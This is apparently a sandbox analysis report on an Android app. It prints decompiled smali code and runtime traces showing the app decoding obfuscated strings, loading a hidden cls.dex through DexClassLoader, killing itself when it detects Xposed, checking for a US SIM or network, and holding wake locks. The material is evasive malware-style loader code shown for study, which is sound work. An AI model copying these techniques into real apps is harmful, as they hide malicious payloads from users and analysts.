  • /data/data/com.czybg.eqtbdmzpklrgyns/files/cls.dex
  • /data/data/com.czybg.eqtbdmzpklrgyns/lib
  • /data/data/com.czybg.eqtbdmzpklrgyns
Position Instruction Meta Information
0.param p1, "a" # Ljava/lang/Object;
1.param p2, "b" # Ljava/lang/Object;
2.param p3, "c" # Ljava/lang/Object;
3.param p4, "d" # Ljava/lang/Object;
4.prologue
5try_start_0: new-instance v1, Ljava/lang/StringBuilder;
7invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
9invoke-virtual {v1, p2}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
10move-result-object v1
12const-string v2, "/lib"
14invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
15move-result-object v1
17invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
18move-result-object p3
20const-string v1, "BxAbARscRRAIBAMXGkUnFA80HhYYED0YFhYSGQ=="
22invoke-virtual {p0, v1}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
23move-result-object v1
25invoke-static {v1}, Ljava/lang/Class;->forName(Ljava/lang/String;)Ljava/lang/Class;
  • Time: 45526
    • p0: dalvik.system.DexClassLoader
    • Return:
      • class dalvik.system.DexClassLoader
      • getName: dalvik.system.DexClassLoader
26move-result-object v1
27const/4 v2, 0x4
28new-array v2, v2, [Ljava/lang/Class;
29const/4 v3, 0x0
31const-string v4, "CRABFlwbCg0WWSQGBQINFg=="
33invoke-virtual {p0, v4}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
34move-result-object v4
36invoke-static {v4}, Ljava/lang/Class;->forName(Ljava/lang/String;)Ljava/lang/Class;
  • Time: 45538
    • p0: java.lang.String
    • Return:
      • class java.lang.String
      • getName: java.lang.String
37move-result-object v4
38aput-object v4, v2, v3
39const/4 v3, 0x1
41const-string v4, "CRABFlwbCg0WWSQGBQINFg=="
43invoke-virtual {p0, v4}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
44move-result-object v4
46invoke-static {v4}, Ljava/lang/Class;->forName(Ljava/lang/String;)Ljava/lang/Class;
  • Time: 45564
    • p0: java.lang.String
    • Return:
      • class java.lang.String
      • getName: java.lang.String
47move-result-object v4
48aput-object v4, v2, v3
49const/4 v3, 0x2
51const-string v4, "CRABFlwbCg0WWSQGBQINFg=="
53invoke-virtual {p0, v4}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
54move-result-object v4
56invoke-static {v4}, Ljava/lang/Class;->forName(Ljava/lang/String;)Ljava/lang/Class;
  • Time: 45574
    • p0: java.lang.String
    • Return:
      • class java.lang.String
      • getName: java.lang.String
57move-result-object v4
58aput-object v4, v2, v3
59const/4 v3, 0x3
61const-string v4, "CRABFlwbCg0WWTQeFhgQPRgWFhIZ"
63invoke-virtual {p0, v4}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
64move-result-object v4
66invoke-static {v4}, Ljava/lang/Class;->forName(Ljava/lang/String;)Ljava/lang/Class;
  • Time: 45584
    • p0: java.lang.ClassLoader
    • Return:
      • class java.lang.ClassLoader
      • getName: java.lang.ClassLoader
67move-result-object v4
68aput-object v4, v2, v3
70invoke-virtual {v1, v2}, Ljava/lang/Class;->getConstructor([Ljava/lang/Class;)Ljava/lang/reflect/Constructor;
71move-result-object v1
72const/4 v2, 0x4
73new-array v2, v2, [Ljava/lang/Object;
74const/4 v3, 0x0
75aput-object p1, v2, v3
76const/4 v3, 0x1
77aput-object p2, v2, v3
78const/4 v3, 0x2
79aput-object p3, v2, v3
80const/4 v3, 0x3
81aput-object p4, v2, v3
83invoke-virtual {v1, v2}, Ljava/lang/reflect/Constructor;->newInstance([Ljava/lang/Object;)Ljava/lang/Object;
  • Time: 55765
    • This:
      • public dalvik.system.DexClassLoader(java.lang.String,java.lang.String,java.lang.String,java.lang.ClassLoader)
    • p0: /data/data/com.czybg.eqtbdmzpklrgyns/files/cls.dex
    • p1: /data/data/com.czybg.eqtbdmzpklrgyns
    • p2: /data/data/com.czybg.eqtbdmzpklrgyns/lib
    • p3: dalvik.system.PathClassLoader[DexPathList[[zip file "/data/app/com.czybg.eqtbdmzpklrgyns-1/base.apk"],nativeLibraryDirectories=[/vendor/lib, /system/lib]]]
    • Return:
      • dalvik.system.DexClassLoader[DexPathList[[dex file "/data/data/com.czybg.eqtbdmzpklrgyns/files/cls.dex"],nativeLibraryDirectories=[/vendor/lib, /system/lib]]]
84try_end_6a: move-result-object v1
85goto_6b: return-object v1
86catch_6c: move-exception v0
87const/4 v1, 0x0
88goto/16 :goto_6b
Cross References
APIs
  • java.lang.Object.<init>
  • android.os.Looper.getMainLooper
  • android.os.Handler.<init>
  • android.content.Context.getPackageManager
  • pvsaeqhpgq.zvsin.getPackageName
  • android.content.pm.PackageManager.checkPermission
  • android.net.wifi.WifiManager$WifiLock.release
  • android.net.wifi.WifiManager.createWifiLock
  • android.net.wifi.WifiManager$WifiLock.acquire
  • android.os.PowerManager$WakeLock.release
  • pvsaeqhpgq.zvsin.getSystemService
  • android.os.PowerManager.newWakeLock
  • android.os.PowerManager$WakeLock.acquire
Strings
  • android.permission.WAKE_LOCK
  • com.czybg.eqtbdmzpklrgyns
  • wifi
  • WifiWakeLock
  • power
  • WL
Position Instruction Meta Information
0const/4 v2, 0x1
2invoke-direct {p0}, Ljava/lang/Object;-><init>()V
3new-instance v0, Landroid/os/Handler;
5invoke-static {}, Landroid/os/Looper;->getMainLooper()Landroid/os/Looper;
6move-result-object v1
8invoke-direct {v0, v1}, Landroid/os/Handler;-><init>(Landroid/os/Looper;)V
9iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/qwAiT;->DiXsQ:Landroid/os/Handler;
10iput-boolean v2, p0, Lcom/czybg/eqtbdmzpklrgyns/qwAiT;->jVOak:Z
11iput-boolean v2, p0, Lcom/czybg/eqtbdmzpklrgyns/qwAiT;->xnLvoQ:Z
12iput-object p1, p0, Lcom/czybg/eqtbdmzpklrgyns/qwAiT;->Odjrct:Landroid/content/Context;
14invoke-virtual {p1}, Landroid/content/Context;->getPackageManager()Landroid/content/pm/PackageManager;
15move-result-object v0
17const-string v1, "android.permission.WAKE_LOCK"
19invoke-virtual {p1}, Landroid/content/Context;->getPackageName()Ljava/lang/String;
  • Time: 55991
    • This:
      • pvsaeqhpgq.zvsin@15460b30
    • Return:
      • com.czybg.eqtbdmzpklrgyns
20move-result-object v3
22invoke-virtual {v0, v1, v3}, Landroid/content/pm/PackageManager;->checkPermission(Ljava/lang/String;Ljava/lang/String;)I
23move-result v0
24if-nez v0, :cond_64
26sget-object v0, Lcom/czybg/eqtbdmzpklrgyns/QZjOxmUK;->DiXsQ:Landroid/net/wifi/WifiManager$WifiLock;
27if-eqz v0, :cond_2e
29sget-object v0, Lcom/czybg/eqtbdmzpklrgyns/QZjOxmUK;->DiXsQ:Landroid/net/wifi/WifiManager$WifiLock;
31invoke-virtual {v0}, Landroid/net/wifi/WifiManager$WifiLock;->release()V
32cond_2e:
33const-string v0, "wifi"
35invoke-virtual {p1, v0}, Landroid/content/Context;->getSystemService(Ljava/lang/String;)Ljava/lang/Object;
  • Time: 55999
    • This:
      • pvsaeqhpgq.zvsin@15460b30
    • p0: wifi
    • Return:
      • android.net.wifi.WifiManager@31a7589e
36move-result-object v0
37check-cast v0, Landroid/net/wifi/WifiManager;
38sget v1, Landroid/os/Build$VERSION;->SDK_INT:I
39const/16 v3, 0xc
40if-lt v1, v3, :cond_68
41const/4 v1, 0x3
42goto_3d:
43const-string v3, "WifiWakeLock"
45invoke-virtual {v0, v1, v3}, Landroid/net/wifi/WifiManager;->createWifiLock(ILjava/lang/String;)Landroid/net/wifi/WifiManager$WifiLock;
46move-result-object v0
47sput-object v0, Lcom/czybg/eqtbdmzpklrgyns/QZjOxmUK;->DiXsQ:Landroid/net/wifi/WifiManager$WifiLock;
49invoke-virtual {v0}, Landroid/net/wifi/WifiManager$WifiLock;->acquire()V
51sget-object v0, Lcom/czybg/eqtbdmzpklrgyns/QZjOxmUK;->Odjrct:Landroid/os/PowerManager$WakeLock;
52if-eqz v0, :cond_51
54sget-object v0, Lcom/czybg/eqtbdmzpklrgyns/QZjOxmUK;->Odjrct:Landroid/os/PowerManager$WakeLock;
56invoke-virtual {v0}, Landroid/os/PowerManager$WakeLock;->release()V
57cond_51:
58const-string v0, "power"
60invoke-virtual {p1, v0}, Landroid/content/Context;->getSystemService(Ljava/lang/String;)Ljava/lang/Object;
  • Time: 56002
    • This:
      • pvsaeqhpgq.zvsin@15460b30
    • p0: power
    • Return:
      • android.os.PowerManager@2cca7b4c
61move-result-object v0
62check-cast v0, Landroid/os/PowerManager;
64const-string v1, "WL"
66invoke-virtual {v0, v2, v1}, Landroid/os/PowerManager;->newWakeLock(ILjava/lang/String;)Landroid/os/PowerManager$WakeLock;
67move-result-object v0
68sput-object v0, Lcom/czybg/eqtbdmzpklrgyns/QZjOxmUK;->Odjrct:Landroid/os/PowerManager$WakeLock;
70invoke-virtual {v0}, Landroid/os/PowerManager$WakeLock;->acquire()V
71cond_64:
72invoke-virtual {p0}, Lcom/czybg/eqtbdmzpklrgyns/qwAiT;->DiXsQ()V
73return-void
74cond_68: move v1, v2
75goto/16 :goto_3d
Cross References
APIs
  • com.czybg.eqtbdmzpklrgyns.MainApp.getSystemService
  • android.telephony.TelephonyManager.getSimCountryIso
  • java.lang.String.length
  • java.lang.String.toLowerCase
  • java.lang.String.equals
  • android.telephony.TelephonyManager.getPhoneType
  • android.telephony.TelephonyManager.getNetworkCountryIso
  • java.lang.String.length
  • java.lang.String.toLowerCase
  • java.lang.String.equals
Strings
  • phone
  • us
Position Instruction Meta Information
0const/4 v2, 0x1
1const/4 v1, 0x0
2const/4 v5, 0x2
3try_start_3:
4const-string v0, "phone"
6invoke-virtual {p0, v0}, Landroid/content/Context;->getSystemService(Ljava/lang/String;)Ljava/lang/Object;
  • Time: 55930
    • This:
      • com.czybg.eqtbdmzpklrgyns.MainApp@850754a
    • p0: phone
    • Return:
      • android.telephony.TelephonyManager@303eb5d8
7move-result-object v0
8check-cast v0, Landroid/telephony/TelephonyManager;
9if-nez v0, :cond_f
10move v0, v1
11goto_e: return v0
12cond_f:
13invoke-virtual {v0}, Landroid/telephony/TelephonyManager;->getSimCountryIso()Ljava/lang/String;
14move-result-object v3
15if-eqz v3, :cond_29
17invoke-virtual {v3}, Ljava/lang/String;->length()I
18move-result v4
19if-ne v4, v5, :cond_29
21invoke-virtual {v3}, Ljava/lang/String;->toLowerCase()Ljava/lang/String;
22move-result-object v0
24const-string v3, "us"
26invoke-virtual {v0, v3}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
27move-result v0
28if-eqz v0, :cond_4a
29move v0, v2
30goto/16 :goto_e
31cond_29:
32invoke-virtual {v0}, Landroid/telephony/TelephonyManager;->getPhoneType()I
  • Time: 55938
    • This:
      • android.telephony.TelephonyManager@303eb5d8
    • Return:
      • 0
33move-result v3
34if-eq v3, v5, :cond_4a
36invoke-virtual {v0}, Landroid/telephony/TelephonyManager;->getNetworkCountryIso()Ljava/lang/String;
37move-result-object v0
38if-eqz v0, :cond_4a
40invoke-virtual {v0}, Ljava/lang/String;->length()I
41move-result v3
42if-ne v3, v5, :cond_4a
44invoke-virtual {v0}, Ljava/lang/String;->toLowerCase()Ljava/lang/String;
45move-result-object v0
47const-string v3, "us"
49invoke-virtual {v0, v3}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
50try_end_44: move-result v0
51if-eqz v0, :cond_4a
52move v0, v2
53goto/16 :goto_e
54catch_49: move-exception v0
55cond_4a: move v0, v1
56goto/16 :goto_e
APIs
  • android.app.Application.attachBaseContext
  • java.io.File.<init>
  • android.os.Process.myPid
  • android.os.Process.killProcess
  • java.lang.Object.getClass
  • etxtfvw.cqwwrwk.unFeJNljZsjaw
  • java.lang.Class.getDeclaredMethod
  • etxtfvw.cqwwrwk.YRkFJMV
Strings
  • /system/framework/XposedBridge.jar
  • OiMcMTg6PQ==
  • YRkFJMV
Position Instruction Meta Information
0.param p1, "base" # Landroid/content/Context;
1.prologue
3invoke-super {p0, p1}, Landroid/app/Application;->attachBaseContext(Landroid/content/Context;)V
5invoke-direct {p0}, Letxtfvw/cqwwrwk;->YVAFbUcSQ()Z
  • Time: 43853
    • This:
      • /system/framework/XposedBridge.jar
    • p0: /system/framework/XposedBridge.jar
    • Return:
      • /system/framework/XposedBridge.jar
  • Time: 43866
    • This:
      • etxtfvw.cqwwrwk@32c17d93
    • Return:
      • false
6move-result v0
7if-eqz v0, :cond_11
9invoke-static {}, Landroid/os/Process;->myPid()I
10move-result v0
12invoke-static {v0}, Landroid/os/Process;->killProcess(I)V
13goto_10: return-void
14cond_11:
15invoke-virtual {p0}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
16move-result-object v0
18const-string v1, "OiMcMTg6PQ=="
20invoke-virtual {p0, v1}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
21move-result-object v1
22const/4 v2, 0x0
23new-array v2, v2, [Ljava/lang/Class;
25invoke-virtual {v0, v1, v2}, Ljava/lang/Class;->getDeclaredMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
  • Time: 43878
    • This:
      • class etxtfvw.cqwwrwk
      • getName:etxtfvw.cqwwrwk
    • p0: YRkFJMV
    • p1: [Ljava.lang.Class;@1f308d94
    • Return:
      • private void etxtfvw.cqwwrwk.YRkFJMV()
      • getName: YRkFJMV
26move-result-object v0
27const/4 v1, 0x0
28new-array v1, v1, [Ljava/lang/Object;
30invoke-virtual {v0, p0, v1}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
  • Reflective invoke: etxtfvw.cqwwrwk.YRkFJMV
    • This:
      • etxtfvw.cqwwrwk@32c17d93
    • Return:
      • null
  • Time: 55809
    • This:
      • private void etxtfvw.cqwwrwk.YRkFJMV()
      • getName:YRkFJMV
    • p0: etxtfvw.cqwwrwk@32c17d93
    • p1: [Ljava.lang.Object;@1a8a7dd7
    • Return:
      • null
31try_end_28: goto/16 :goto_10
32catch_29: move-exception v0
33goto/16 :goto_10
APIs
  • etxtfvw.cqwwrwk.unFeJNljZsjaw
  • java.security.MessageDigest.getInstance
  • java.security.MessageDigest.digest
  • java.lang.StringBuffer.<init>
  • java.lang.Integer.toHexString
  • java.lang.String.substring
  • java.lang.StringBuffer.append
  • java.lang.StringBuffer.toString
Strings
  • LjVC
  • MD5
Position Instruction Meta Information
0.param p1, "raw" # [B
1.prologue
2try_start_0:
3const-string v5, "LjVC"
5invoke-virtual {p0, v5}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
6move-result-object v5
8invoke-static {v5}, Ljava/security/MessageDigest;->getInstance(Ljava/lang/String;)Ljava/security/MessageDigest;
  • Time: 44512
    • p0: MD5
    • Return:
      • MESSAGE DIGEST MD5
9move-result-object v0
11invoke-virtual {v0, p1}, Ljava/security/MessageDigest;->digest([B)[B
  • Time: 44519
    • This:
      • MESSAGE DIGEST MD5
    • p0: [B@17b92fe
    • p0: 050;~0*H0J10UUS10UUS10UUS10UUS10U10U0 171022132839Z21540914132839Z0J10UUS10UUS10UUS10UUS10U10U0"0*H0WX^jOK'x`CNG':QtC|pU1!},O?|:>.T3*ov]F#1oQ~+!'GyVo): UyM[52:~V$&] \CBv)J#=. NNkx=FoR]ro`j:>oX"sHZc)!00Uu.2:.'<[0*HWGTZH+Cc;jM?R)+VmPNAdG3"zh1znUjuYc\
    • p0: 308203353082021DA0030201020204063B7E16300D06092A864886F70D01010B0500304A310B3009060355040613025553310B3009060355040813025553310B3009060355040713025553310B3009060355040A1302555331093007060355040B130031093007060355040313003020170D3137313032323133323833395A180F32313534303931343133323833395A304A310B3009060355040613025553310B3009060355040813025553310B3009060355040713025553310B3009060355040A1302555331093007060355040B1300310930070603550403130030820122300D06092A864886F70D01010105000382010F003082010A0282010100B5570A585EFEF8E96A4F064B2778B1F7AFAE8CA78809A89C604308F794B84E47273AD21BF1517443ECFA7C70FC0C5592E9F131B2217D2CD4B14FA83F9B7C3A1CFEDB3ED42EFFD2C85433017FE0812AFDB91EA7BCD3F4EF6F7613E6E5E95D46F923316F86958EDBB8F4A751A5D1BF7ED22BC82127477956D4D7C0D08119F9D2EF9F6F29CA3A20BA5503B6798AD1E789BE4DC7C8F90CB3065BD135FE9C323A7E56EBCC2489E0265DCA20C3B35C434276294A84230EBEF4EC3D9AF1A5868A9B2E109820014EA1DF4E6BA818A3D18C78B7BB1617A014103D466F52C2905DEFE3726FCCBAB960C30B6AB13ABC3EB10E6FE7EC58FD22731C489809B8A75AE0E1E06329020301
    • Return:
      • [B@2e4a0657
      • oL.mp&
      • 6F0B4C2EBDF76DA41B9C70AB26E8851E
12move-result-object v2
13new-instance v1, Ljava/lang/StringBuffer;
15invoke-direct {v1}, Ljava/lang/StringBuffer;-><init>()V
16const/4 v4, 0x0
17goto_14: array-length v5, v2
18if-ge v4, v5, :cond_2d
19aget-byte v5, v2, v4
20and-int/lit16 v5, v5, 0xff
21or-int/lit16 v5, v5, 0x100
23invoke-static {v5}, Ljava/lang/Integer;->toHexString(I)Ljava/lang/String;
24move-result-object v5
25const/4 v6, 0x1
26const/4 v7, 0x3
28invoke-virtual {v5, v6, v7}, Ljava/lang/String;->substring(II)Ljava/lang/String;
29move-result-object v5
31invoke-virtual {v1, v5}, Ljava/lang/StringBuffer;->append(Ljava/lang/String;)Ljava/lang/StringBuffer;
32add-int/lit8 v4, v4, 0x1
33goto/16 :goto_14
34cond_2d:
35invoke-virtual {v1}, Ljava/lang/StringBuffer;->toString()Ljava/lang/String;
36try_end_30: move-result-object v5
37goto_31: return-object v5
38catch_32: move-exception v3
40const-string v5, ""
41goto/16 :goto_31
Cross References
APIs
  • java.util.ArrayList.<init>
  • android.app.SharedPreferencesImpl.getString
  • android.text.TextUtils.isEmpty
  • org.json.JSONArray.<init>
  • org.json.JSONArray.length
  • org.json.JSONArray.getString
  • java.util.ArrayList.add
  • org.json.JSONException.printStackTrace
Strings
  • 255251
Position Instruction Meta Information
0new-instance v0, Ljava/util/ArrayList;
2invoke-direct {v0}, Ljava/util/ArrayList;-><init>()V
3try_start_5:
4iget-object v1, p0, Lcom/czybg/eqtbdmzpklrgyns/XpiFj;->DiXsQ:Landroid/content/SharedPreferences;
6const-string v2, "255251"
8const-string v3, ""
10invoke-interface {v1, v2, v3}, Landroid/content/SharedPreferences;->getString(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
  • Time: 56036
    • This:
      • android.app.SharedPreferencesImpl@3b635811
    • p0: 255251
    • p1: ""
    • Return:
      • ""
11move-result-object v1
13invoke-static {v1}, Landroid/text/TextUtils;->isEmpty(Ljava/lang/CharSequence;)Z
14move-result v2
15if-eqz v2, :cond_16
16cond_15: return-object v0
17cond_16: new-instance v2, Lorg/json/JSONArray;
19invoke-direct {v2, v1}, Lorg/json/JSONArray;-><init>(Ljava/lang/String;)V
20const/4 v1, 0x0
21goto_1c:
22invoke-virtual {v2}, Lorg/json/JSONArray;->length()I
23move-result v3
24if-ge v1, v3, :cond_15
26invoke-virtual {v2, v1}, Lorg/json/JSONArray;->getString(I)Ljava/lang/String;
27move-result-object v3
29invoke-virtual {v0, v3}, Ljava/util/ArrayList;->add(Ljava/lang/Object;)Z
30try_end_29: add-int/lit8 v1, v1, 0x1
31goto/16 :goto_1c
32catch_2c: move-exception v1
34invoke-virtual {v1}, Lorg/json/JSONException;->printStackTrace()V
35goto/16 :goto_15
APIs
  • android.app.Application.onCreate
  • java.lang.Object.getClass
  • java.lang.Class.getDeclaredMethod
  • etxtfvw.cqwwrwk.onCreate
  • java.lang.IllegalAccessException.printStackTrace
  • java.lang.reflect.InvocationTargetException.printStackTrace
  • java.lang.NoSuchMethodException.printStackTrace
Strings
  • onCreate
Position Instruction Meta Information
0.prologue
2invoke-super {p0}, Landroid/app/Application;->onCreate()V
3try_start_3:
4iget-object v3, p0, Lpvsaeqhpgq/zvsin;->cdnUnCMxBrmaeu:Ljava/lang/Object;
6invoke-virtual {v3}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
7move-result-object v0
9const-string v3, "onCreate"
10const/4 v4, 0x0
11new-array v4, v4, [Ljava/lang/Class;
13invoke-virtual {v0, v3, v4}, Ljava/lang/Class;->getDeclaredMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
  • Time: 55818
    • This:
      • class etxtfvw.cqwwrwk
      • getName:etxtfvw.cqwwrwk
    • p0: onCreate
    • p1: [Ljava.lang.Class;@115404e2
    • Return:
      • public void etxtfvw.cqwwrwk.onCreate()
      • getName: onCreate
14move-result-object v1
16iget-object v3, p0, Lpvsaeqhpgq/zvsin;->cdnUnCMxBrmaeu:Ljava/lang/Object;
17const/4 v4, 0x0
18new-array v4, v4, [Ljava/lang/Object;
20invoke-virtual {v1, v3, v4}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
  • Reflective invoke: etxtfvw.cqwwrwk.onCreate
    • This:
      • etxtfvw.cqwwrwk@32c17d93
    • Return:
      • null
  • Time: 55961
    • This:
      • public void etxtfvw.cqwwrwk.onCreate()
      • getName:onCreate
    • p0: etxtfvw.cqwwrwk@32c17d93
    • p1: [Ljava.lang.Object;@4cf17ee
    • Return:
      • null
21goto_1a: return-void
22catch_1b: move-exception v2
24invoke-virtual {v2}, Ljava/lang/IllegalAccessException;->printStackTrace()V
25goto/16 :goto_1a
26catch_20: move-exception v2
28invoke-virtual {v2}, Ljava/lang/reflect/InvocationTargetException;->printStackTrace()V
29goto/16 :goto_1a
30catch_25: move-exception v2
32invoke-virtual {v2}, Ljava/lang/NoSuchMethodException;->printStackTrace()V
33goto/16 :goto_1a
Cross References
APIs
  • android.content.ComponentName.<init>
  • android.app.admin.DevicePolicyManager.isAdminActive
  • java.util.concurrent.atomic.AtomicBoolean.set
  • android.os.Looper.getMainLooper
  • android.os.Handler.<init>
  • android.os.Handler.postDelayed
  • pvsaeqhpgq.zvsin.getApplicationContext
Position Instruction Meta Information
0if-nez p1, :cond_14
2iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/hekJfDg;->Odjrct:Landroid/app/admin/DevicePolicyManager;
3new-instance v1, Landroid/content/ComponentName;
5iget-object v2, p0, Lcom/czybg/eqtbdmzpklrgyns/hekJfDg;->hZyMGHgz:Landroid/content/Context;
6const-class v3, Lcom/czybg/eqtbdmzpklrgyns/BYdZZAIwCWFdZwW;
8invoke-direct {v1, v2, v3}, Landroid/content/ComponentName;-><init>(Landroid/content/Context;Ljava/lang/Class;)V
10invoke-virtual {v0, v1}, Landroid/app/admin/DevicePolicyManager;->isAdminActive(Landroid/content/ComponentName;)Z
  • Time: 56043
    • This:
      • android.app.admin.DevicePolicyManager@1f2c60aa
    • who: ComponentInfo{com.czybg.eqtbdmzpklrgyns/com.czybg.eqtbdmzpklrgyns.BYdZZAIwCWFdZwW}
    • Return:
      • false
11move-result v0
12if-eqz v0, :cond_14
13goto_13: return-void
14cond_14:
15sget-object v0, Lcom/czybg/eqtbdmzpklrgyns/hekJfDg;->DiXsQ:Ljava/util/concurrent/atomic/AtomicBoolean;
16const/4 v1, 0x0
18invoke-virtual {v0, v1}, Ljava/util/concurrent/atomic/AtomicBoolean;->set(Z)V
19new-instance v1, Landroid/os/Handler;
21invoke-static {}, Landroid/os/Looper;->getMainLooper()Landroid/os/Looper;
22move-result-object v0
24invoke-direct {v1, v0}, Landroid/os/Handler;-><init>(Landroid/os/Looper;)V
25new-instance v0, Lcom/czybg/eqtbdmzpklrgyns/dsMcrI;
27invoke-direct {v0, p0, v1}, Lcom/czybg/eqtbdmzpklrgyns/dsMcrI;-><init>(Lcom/czybg/eqtbdmzpklrgyns/hekJfDg;Landroid/os/Handler;)V
28const-wide/16 v2, 0x7d0
30invoke-virtual {v1, v0, v2, v3}, Landroid/os/Handler;->postDelayed(Ljava/lang/Runnable;J)Z
32iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/hekJfDg;->hZyMGHgz:Landroid/content/Context;
34invoke-virtual {v0}, Landroid/content/Context;->getApplicationContext()Landroid/content/Context;
  • Time: 56048
    • This:
      • pvsaeqhpgq.zvsin@15460b30
    • Return:
      • pvsaeqhpgq.zvsin@15460b30
35move-result-object v0
36check-cast v0, Landroid/app/Application;
37new-instance v2, Lcom/czybg/eqtbdmzpklrgyns/iTuIjJC;
39invoke-direct {v2, p0, v1}, Lcom/czybg/eqtbdmzpklrgyns/iTuIjJC;-><init>(Lcom/czybg/eqtbdmzpklrgyns/hekJfDg;Landroid/os/Handler;)V
41invoke-static {v0, v2}, Lcom/czybg/eqtbdmzpklrgyns/YAIwLmyd;->DiXsQ(Landroid/app/Application;Lcom/czybg/eqtbdmzpklrgyns/FSdEX;)V
43invoke-direct {p0}, Lcom/czybg/eqtbdmzpklrgyns/hekJfDg;->DiXsQ()V
44goto/16 :goto_13
Cross References
APIs
  • android.app.SharedPreferencesImpl.getString
Strings
  • ttrgsvwser
Position Instruction Meta Information
1iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/EZmcnv;->DiXsQ:Landroid/content/SharedPreferences;
3const-string v1, "ttrgsvwser"
5const-string v2, ""
7invoke-interface {v0, v1, v2}, Landroid/content/SharedPreferences;->getString(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
  • Time: 56119
    • This:
      • android.app.SharedPreferencesImpl@261a1214
    • p0: ttrgsvwser
    • p1: ""
    • Return:
      • ""
8move-result-object v0
9return-object v0
Cross References
APIs
  • android.app.SharedPreferencesImpl.getString
Strings
  • kgfhjkhfshafd
Position Instruction Meta Information
1iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/EZmcnv;->DiXsQ:Landroid/content/SharedPreferences;
3const-string v1, "kgfhjkhfshafd"
5const-string v2, ""
7invoke-interface {v0, v1, v2}, Landroid/content/SharedPreferences;->getString(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
  • Time: 56106
    • This:
      • android.app.SharedPreferencesImpl@261a1214
    • p0: kgfhjkhfshafd
    • p1: ""
    • Return:
      • ""
8move-result-object v0
9return-object v0
Cross References
APIs
  • java.lang.StringBuilder.<init>
  • java.lang.StringBuilder.append
  • java.lang.StringBuilder.toString
  • java.lang.StringBuilder.<init>
  • java.lang.StringBuilder.append
  • etxtfvw.cqwwrwk.OHYwEQXCDQNp
  • java.lang.Object.getClass
  • java.lang.Class.getSimpleName
  • java.lang.String.getBytes
  • etxtfvw.cqwwrwk.aHDpotVQ
  • java.lang.String.<init>
  • java.lang.StringBuilder.append
  • java.lang.StringBuilder.toString
Strings
  • NyMxNCQuLCEkPz48OCE2KCMwJDE5IA==
  • BgYFHwASHAsUAAUaEhwRGQ==
  • BROqnOXwFKWnWc
  • CNLldGq
  • DEFAULT
  • GET_SIGNATURES
  • MD5
  • UMQrTOWqmLF
  • YRkFJMV
  • [B
  • android.app.Application
  • android.app.Instrumentation
  • android.content.Context
  • android.content.pm.PackageManager
  • android.content.res.AssetManager
  • android.util.Base64
  • available
  • close
  • cls.dex
  • com/czybg/eqtbdmzpklrgyns/MainApp
  • createNewFile
  • dalvik.system.DexClassLoader
  • decode
  • getAbsolutePath
  • getAssets
  • getBaseContext
  • getBytes
  • getClassLoader
  • getFilesDir
  • getPackageInfo
  • getPackageManager
  • getPackageName
  • getParentFile
  • getParent
  • java.io.FileOutputStream
  • java.io.File
  • java.lang.ClassLoader
  • java.lang.Class
  • java.lang.String
  • loadClass
  • newApplication
  • oDOixVSpHMour
  • onCreate
  • open
  • parent
  • read
  • separator
  • signatures
  • toByteArray
  • write
Position Instruction Meta Information
0.param p1, "s" # Ljava/lang/String;
1.prologue
3const-string v0, "NyMxNCQuLCEkPz48OCE2KCMwJDE5IA=="
4new-instance v1, Ljava/lang/StringBuilder;
6invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
8invoke-virtual {v1, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
9move-result-object v1
11const-string v2, "BgYFHwASHAsUAAUaEhwRGQ=="
13invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
14move-result-object v1
16invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
17move-result-object v0
18new-instance v1, Ljava/lang/StringBuilder;
20invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
22const-string v2, ""
24invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
25move-result-object v1
26new-instance v2, Ljava/lang/String;
28invoke-direct {p0, p1}, Letxtfvw/cqwwrwk;->OHYwEQXCDQNp(Ljava/lang/String;)[B
29move-result-object v3
31invoke-virtual {p0}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
32move-result-object v4
34invoke-virtual {v4}, Ljava/lang/Class;->getSimpleName()Ljava/lang/String;
35move-result-object v4
37invoke-virtual {v4}, Ljava/lang/String;->getBytes()[B
38move-result-object v4
40invoke-direct {p0, v3, v4}, Letxtfvw/cqwwrwk;->aHDpotVQ([B[B)[B
41move-result-object v3
